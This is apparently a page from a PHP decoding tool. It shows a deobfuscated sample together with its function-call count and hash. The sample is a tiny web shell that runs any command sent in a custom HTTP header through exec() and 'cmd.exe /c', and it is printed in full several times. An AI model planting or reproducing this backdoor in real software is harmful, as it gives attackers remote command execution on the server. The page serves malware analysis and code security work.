Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if($_SERVER['HTTP_E1044'] != null){ echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044'..

Decoded Output download

<?php 
if($_SERVER['HTTP_E1044'] != null){ 
	echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044']); 
} 
?> 

Did this file decode correctly?

Original Code

<?php
if($_SERVER['HTTP_E1044'] != null){
	echo exec("cmd.exe /c ".$_SERVER['HTTP_E1044']);
}
?>

Function Calls

exec 1

Variables

None

Stats

MD5 4e41b177269f91614b32db9063b5d3bd
Eval Count 0
Decode Time 126 ms